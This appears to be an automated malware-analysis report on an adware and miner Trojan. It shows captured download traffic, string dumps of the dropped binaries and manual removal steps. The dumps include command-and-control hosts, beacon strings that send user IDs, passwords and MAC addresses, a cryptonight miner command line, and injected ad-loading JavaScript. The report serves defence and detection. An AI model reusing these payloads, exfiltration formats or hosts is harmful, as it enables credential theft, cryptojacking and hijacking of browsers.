Date: Mon, 06 Apr 2015 01:53:25 GMT
Content-Type: text/plain
Content-Length: 861
Connection: close
Accept-Ranges: bytes
ETag: "5F518A33E3525F232868CB7B8D966762"
Last-Modified: Wed, 01 Apr 2015 16:00:47 GMT
Server: AliyunOSS
x-oss-request-id: 5521E715A97F0D894E6C866D
[File]..kuaibu8=hXXp://VVV.kuaibu8.com/iniuser/..uc916=hXXp://VVV.uc91
6.com/iniuser/..szicoad=hXXp://VVV.kuaibu8.com:8089/ico/..minyang=http
://mingyangdown.oss-cn-qingdao.aliyuncs.com/userini/..[update]..Startu
pdate=yes..kuaibu8=kuaibu8..szicoad=szicoad..minyang=minyang..uc916=uc
916..[server]..01=down04.kuaibu8.com..02=down04.kuaibu8.com..03=down04
.kuaibu8.com..04=down04.kuaibu8.com..05=down04.kuaibu8.com..06=down04.
kuaibu8.com..07=down04.kuaibu8.com..08=down04.kuaibu8.com..09=down04.k
uaibu8.com..10=down04.kuaibu8.com..[dllhost]..yewu01=/updata/adclient/
ie/ieadd.dll..yewu02=/updata/adclient/cpu/cpu.dll..yewu03=/updata/adcl
ient/sohu/sohuvip.dll..yewu04=/updata/adclient/kbts/kbts.dll..yewu05=/
updata/adclient/pcfen/pcfen.dll..yewu06=/updata/adclient/desk/desk1.ex
e..yewu07=/updata/adclient/iejs/iejs.dll..yewu99=/updata/adclient/yile
you/yileyou.dll..

<<< skipped >>>

GET /updata/adclient/client/szicoad.exe HTTP/1.1
User-Agent: AutoIt
Host: down04.kuaibu8.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:36 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E720CF90B15A28922240

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

bv.exe_464:

.text
`.rdata
@.data
.rsrc
CCmdTarget
%*.*f
commctrl_DragListMsg
COMCTL32.DLL
CNotSupportedException
MSWHEEL_ROLLMSG
ole32.dll
__MSVCRT_HEAP_SELECT
user32.dll
WS2_32.dll
WinExec
GetCPInfo
KERNEL32.dll
ExitWindowsEx
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
USER32.dll
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GDI32.dll
comdlg32.dll
WINSPOOL.DRV
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
COMCTL32.dll
oledlg.dll
OLEPRO32.DLL
OLEAUT32.dll
iphlpapi.dll
%s\%s
explorer.exe
wbz1.exe
byteFirewall.dat
x-x-x-x-x-x
3.3.3.3
.?AVCCmdTarget@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCResourceException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCFileException@@
zcÁ
windows
KERNEL32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\bv.exe
h.rdata
H.data
.pdata
.reloc
TransportAddress
%d.%d.%d.%d
e:\bvaccdriver\tdi_hook_demo0828\objfre_win7_amd64\amd64\tdihook.pdb
ntoskrnl.exe
TDI.SYS
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
e:\bvaccdriver\tdi_hook_demo0828\objfre_wxp_x86\i386\tdihook.pdb
HAL.dll
1, 0, 0, 1
ByteFirewall.EXE
\Device\Udp
\Device\Tcp
\Driver\Tcpip
(*.*)

comdhost.exe_424:

.text
`.rdata
@.data
.rsrc
@.reloc
<!--%s-->
&#xX;
</%s>
%s='%s'
%s="%s"
<![CDATA[%s]]>
standalone="%s"
encoding="%s"
version="%s"
operator
GetProcessWindowStation
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
VVV.3322.org
msvcr32.dll
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%s%s%s
127.0.0.1
awangba.com
user=%s&id=%s&pw=%s&type=%s&run=%s&ip=%s&mac=%s&sysinfo=%s&client=e.%d
user=%s&id=%s&pw=%s&type=%s&ip=%s&mac=%s&sysinfo=%s&client=e
ProjPack.xml
hXXp://domain.awangba.com.cn/config.xml
plusconfig.xml
cudp
sudp
AplusFile.bt
stcp1
stcp2
00:00:00:00:00:00
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
M-d-d%s
\\.\pipe\wangbax
Z:\svn\trunk\Develop\APlusClient\Win32\Release\BackEnd32.pdb
CreateNamedPipeA
ConnectNamedPipe
DisconnectNamedPipe
KERNEL32.dll
USER32.dll
RegOpenKeyA
RegEnumKeyExA
RegCloseKey
ADVAPI32.dll
WS2_32.dll
SHLWAPI.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
URLDownloadToFileA
urlmon.dll
PSAPI.DLL
IPHLPAPI.DLL
GetCPInfo
GetProcessHeap
zcÁ
.?AVCMd5@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\comdhost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt
F3450EDC-EAF6-BCE5-BEC8-25CF003FE045
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt\AplusFile.bt
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
1$1)1014191
8,888\8|8
9 9$9,9@9\9`9
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.0.0.2
BackEnd.exe
1.120.1.3241

brocount.exe_1764:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
awangba.com
id=%s&mac=%s&brower=%s&user=%s&pw=%s
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
X:X:X:X:X:X
M-d-d%s
Z:\svn\trunk\Develop\APlusClient\Release\CountBro.pdb
KERNEL32.dll
USER32.dll
RegOpenKeyA
RegEnumKeyExA
RegCloseKey
ADVAPI32.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
GetCPInfo
iexplore.exe
360se.exe
360chrome.exe
2345Explorer.exe
QQBrowser.exe
TTraveler.exe
f1browser.exe
Tango3.exe
2291Browser.exe
chrome.exe
firefox.exe
baidubrowser.exe
SogouExplorer.exe
miniie.exe
win-ie.exe
TheWorld.exe
twchrome.exe
.?AVCMd5@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.0.0.1
1.147.1.3131

svchost.exe_1284:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
VVV.3322.org
9ACDDBD0-4236-4127-CCCC-B00F6AA7AB33
00:00:00:00:00:00
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
M-d-d%s
127.0.0.1
awangba.com
pw=%s&id=%s&user=%s&type=%s&mac=%s&cpun=%d&cpux=%d&sysinfo=%s&ip=%s&worker=%d
taskmgr.exe
mssrv.exe
%s -a cryptonight -o %s -u %s -p x -t %d
hXXp://tongji.wangbax.cn/eda/cpuConfig
apluscpuconfig.ini
%s_%s
getEdaAddress.awangba.com
type=cpu&version=cpu1.0&user=%s&son=%s&pw=%s&osbit=%d&client=1.0.0
Z:\svn\trunk\Develop\CPUClient\Win32\Release\BootKit32.pdb
KERNEL32.dll
USER32.dll
RegOpenKeyExA
RegCloseKey
RegOpenKeyA
RegEnumKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
URLDownloadToFileA
urlmon.dll
PSAPI.DLL
IPHLPAPI.DLL
GetCPInfo
.?AVCMd5@@
37.57.16.189
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2=3
? ?$?,?@?`?|?
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.112.1.11111
BootKit.exe
1.0.0.9

FC.exe_1516:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
M-d-d%s
awangba.com
Z:\svn\trunk\Develop\yxjgg\Release\slyxj.pdb
KERNEL32.dll
USER32.dll
RegOpenKeyW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpQueryInfoW
WININET.dll
URLDownloadToFileW
urlmon.dll
IPHLPAPI.DLL
GetCPInfo
.?AVCMd5@@
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
11D1j1
1,2
3 3$3(3|3
mscoree.dll
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
/client/yxjKey?user=
/client/dbKey?user=
yxj.config
hXXp://domain.awangba.com.cn/yxj/config.xml
</BlackUrl>
<BlackUrl>
if (!document.body) return setTimeout(arguments.callee, 50);
var adpro= document.createElement('script');
adpro.type = 'text/javascript';
adpro.text = '_adpro_pub= "
adpro.text = '_adpro_slot= "
document.body.insertBefore(adpro, document.body.children.item(0));
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
adpro.src = 'hXXp://tz.awangba.com.cn/a.js';
var yxj= document.createElement('div');
yxj.id='yxjgg';
document.body.appendChild(yxj);
id=%s&mac=%s&type=%s&user=%s&pw=%s
192.168.
.baidu.com
.hao123.com
.google.com
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe
1.0.0.1
1.141.1.3021

mp.exe_1552:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
Z:\mysvn\trunk\NewMainPage\Release\NewMainPage.pdb
KERNEL32.dll
EnumChildWindows
MapVirtualKeyW
keybd_event
USER32.dll
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
URLDownloadToFileW
urlmon.dll
GetCPInfo
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
1*2024282<2
5 5$5(5,5054585
AKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
ntdll.dll
kernel32.dll
OLEACC.DLL
mp.ini
hXXp://domain.awangba.com.cn/mp/mp.ini
hXXp://123.sogou.com/?71090-1234
hXXp://123.sogou.com/?71049-
hXXp://123.sogou.com/?71090-
hXXp://VVV.duba.com/?un_367393_
hXXp://VVV.sogou.com/index.htm?pid=sogou-netb-38181d991caac98b-
lockmp.dll
explorer.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe
1.0.0.1
1.119.1.3171

300084.exe_256:

.text
`.rdata
@.data
.aspack
.adata
inflate 1.1.3 Copyright 1995-1998 Mark Adler
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
RegCloseKey
RegCreateKeyA
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
MSVCP60.dll
iphlpapi.dll
InternetCrackUrlA
WININET.dll
WS2_32.dll
.\config.ini
%s\config.ini
iexplore.exe
.PAVCInternetException@@
1.1.3
%s%s%s
255.255.255.255
%s?%u
%s.crc?%u
"%s" %s
%s\%s
main.exe
%s\run.ini
X:X:X:X:X:X
center.pcdogs.info
center.boxlist.info
center.oldlist.info
X%sX%sX%sX%sX%sX
kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
msvcrt.dll
advapi32.dll
shell32.dll
msvcp60.dll
wininet.dll
ws2_32.dll

300084.exe_256_rwx_00410000_00003000:

kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
msvcrt.dll
advapi32.dll
shell32.dll
msvcp60.dll
iphlpapi.dll
wininet.dll
ws2_32.dll
RegCloseKey
InternetCrackUrlA


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1612
    bv.exe:464
    7048ico.exe:1096
    comdhost.exe:424

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\E_4\krnln.fnr (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\smss.exe (6435 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bv.exe (1784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\E_4\shell.fne (57 bytes)
    C:\byteFirewall.dat (253 bytes)
    %WinDir%\2015040604\userconfig.ini (22 bytes)
    %WinDir%\2015040604\config.ini (22 bytes)
    %WinDir%\2015040604\svchost.exe (2105 bytes)
    %System%\filelog.dat (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\fsq.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mssrv.exe (38495 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\config[1].xml (617 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\nclound32.zip (78548 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\config.ini (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\common[1].zip (196738 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\plusconfig.xml (617 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjt_qt.exe (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\kjqt[1].zip (5979 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\kjqt.zip (3945 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appboot.exe (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lockmp.dll (11344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\FC[1].zip (7311 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\TT2[1].zip (34919 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\MainCtrl[1].xml (2457 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\FC.zip (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\nclound32[1].zip (124172 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\TT2.zip (17429 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\mainpage32[1].zip (14971 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\AplusFile.bt (1136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjtqt.exe (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lsass.exe (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\mainpage32.zip (5733 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\common.zip (130989 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (1701 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appeight.exe (56684 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
